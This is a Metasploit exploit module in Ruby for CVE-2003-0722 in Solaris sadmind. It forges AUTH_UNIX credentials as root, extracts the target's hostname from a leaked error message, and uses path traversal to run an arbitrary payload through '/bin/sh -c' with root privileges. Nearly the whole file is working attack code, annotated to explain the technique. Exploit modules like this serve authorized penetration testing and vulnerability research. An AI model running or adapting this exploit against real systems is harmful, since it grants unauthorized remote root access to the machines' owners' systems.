Path: blob/master/modules/exploits/solaris/sunrpc/sadmind_exec.rb
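##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote root command execution against Solaris sadmind (CVE-2003-0722).
#
# The module never exploits memory corruption: it builds a legitimate-looking
# sadmind RPC request (program 100232, version 10) carrying AUTH_UNIX
# credentials for UID/GID (defaults 0/0) and asks the server to run
# `../../../bin/sh -c <payload>`.  sadmind's default security level trusts
# those caller-asserted credentials as long as the asserted client host
# matches its own hostname, which is why HOSTNAME must be correct.  When it
# is not supplied, a first request with a random bogus hostname is sent; the
# server's "Security exception on host <name>." rejection leaks the real
# hostname, which is then used for the actual request.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SunRPC

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris sadmind Command Execution',
      'Description'    => %q{
          This exploit targets a weakness in the default security
        settings of the sadmind RPC application. This server is
        installed and enabled by default on most versions of the
        Solaris operating system.

        Vulnerable systems include solaris 2.7, 8, and 9
      },
      'Author'         => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2003-0722'],
          ['OSVDB', '4585'],
          ['BID', '8615']
        ],
      # Commands run as the emulated UID/GID, root by default.
      'Privileged'     => true,
      'Platform'       => %w{ solaris unix },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => "\x00",
          'DisableNops' => true,
          'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DisclosureDate' => '2003-09-13',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        # Must match the hostname sadmind believes it has; auto-detected when
        # unset or empty (the server leaks it in its rejection message).
        OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
        # AUTH_UNIX credentials asserted in the request; 0/0 yields a root shell.
        OptInt.new('GID', [false, 'GID to emulate', 0]),
        OptInt.new('UID', [false, 'UID to emulate', 0])
      ], self.class
    )
  end

  # Entry point: open the UDP RPC client, resolve the hostname, send the
  # payload-bearing request and hand over to the payload handler.
  #
  # The RPC socket is always closed via +ensure+ before the handler starts,
  # including on the early-return paths (no response, hostname not found)
  # that the original flow left open.
  def exploit
    sunrpc_create('udp', 100232, 10)

    begin
      # An empty HOSTNAME is treated like an unset one: sending '' as the
      # client host can only fail, so fall through to detection instead.
      hostname = datastore['HOSTNAME'].to_s
      hostname = detect_hostname if hostname.empty?
      return unless hostname

      # Re-authenticate with the real hostname: AUTH_UNIX carries the
      # machine name, and sadmind compares it against its own.
      sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
      response = sadmind_request(hostname, payload.encoded)
    ensure
      sunrpc_destroy
    end

    if /Security exception on host/.match(response)
      print_error('exploit failed')
      return
    end

    # No rejection is the only success signal sadmind gives us; give the
    # command a moment to start before the handler looks for a session.
    print_status('exploit did not give us an error, this is good...')
    Rex.sleep(1)
    handler
  end

  # Learn the server's hostname from its own error message.
  #
  # Sends a throwaway request authenticated as 'localhost' with a random
  # alphabetic host name; the server rejects it with
  # "Security exception on host <real name>. USER ..." and we capture the
  # name.  Returns the hostname String, or nil (after printing an error)
  # when the server did not answer or the message did not match.
  def detect_hostname
    sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
    print_status('attempting to determine hostname')

    response = sadmind_request(rand_text_alpha(rand(1..10)), "true")
    unless response
      print_error('no response')
      return nil
    end

    match = /Security exception on host (.*)\. USER/.match(response)
    unless match
      print_error('unable to determine hostname')
      return nil
    end

    hostname = match.captures[0]
    print_status("found hostname: #{hostname}")
    hostname
  end

  # Build and send one sadmind "system" class request that invokes
  # `../../../bin/sh -c <command>` on behalf of +host+.
  #
  # @param host    [String] client/server hostname asserted in the request
  # @param command [String] shell command handed to sh -c
  # @return [String, nil] the string field of the decoded reply (the
  #   server's status/error text), nil if the reply lacked it
  def sadmind_request(host, command)
    # Fixed-layout netmgt header.  The constants (loopback address, program
    # 100232 / version 10, the 'system' class and the traversal method name)
    # mirror the argument block below; their exact field meanings are not
    # documented here and were preserved from the original encoding.
    header =
      Rex::Encoder::XDR.encode(0) * 7 +
      Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
        4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
        host, 'system', '../../../bin/sh')

    # Typed argument list.  ADM_METHOD escapes the class directory to reach
    # /bin/sh, and the two unnamed args ('X', 'Y') become `-c <command>`.
    body =
      do_int('ADM_FW_VERSION', 1) +
      do_string('ADM_LANG', 'C') +
      do_string('ADM_REQUESTID', '00009:000000000:0') +
      do_string('ADM_CLASS', 'system') +
      do_string('ADM_CLASS_VERS', '2.1') +
      do_string('ADM_METHOD', '../../../bin/sh') +
      do_string('ADM_HOST', host) +
      do_string('ADM_CLIENT_HOST', host) +
      do_string('ADM_CLIENT_DOMAIN', '') +
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
      do_int('ADM_FENCE', 0) +
      do_string('X', '-c') +
      do_string('Y', command) +
      Rex::Encoder::XDR.encode('netmgt_endofargs')

    # A length word sits between header and body; 326 is presumably the size
    # of the fixed portion it must exclude -- kept verbatim, not re-derived.
    request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body

    ret = sunrpc_call(1, request)
    Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
  end

  # Encode one string-typed sadmind argument: name, type tag 9 (presumably
  # "string"), NUL-inclusive length, value, and two zero trailers.
  def do_string(str1, str2)
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
  end

  # Encode one integer-typed sadmind argument: name, type tag 3 (presumably
  # "integer"), a length of 4, the value, and two zero trailers.
  def do_int(str, int)
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
  end
end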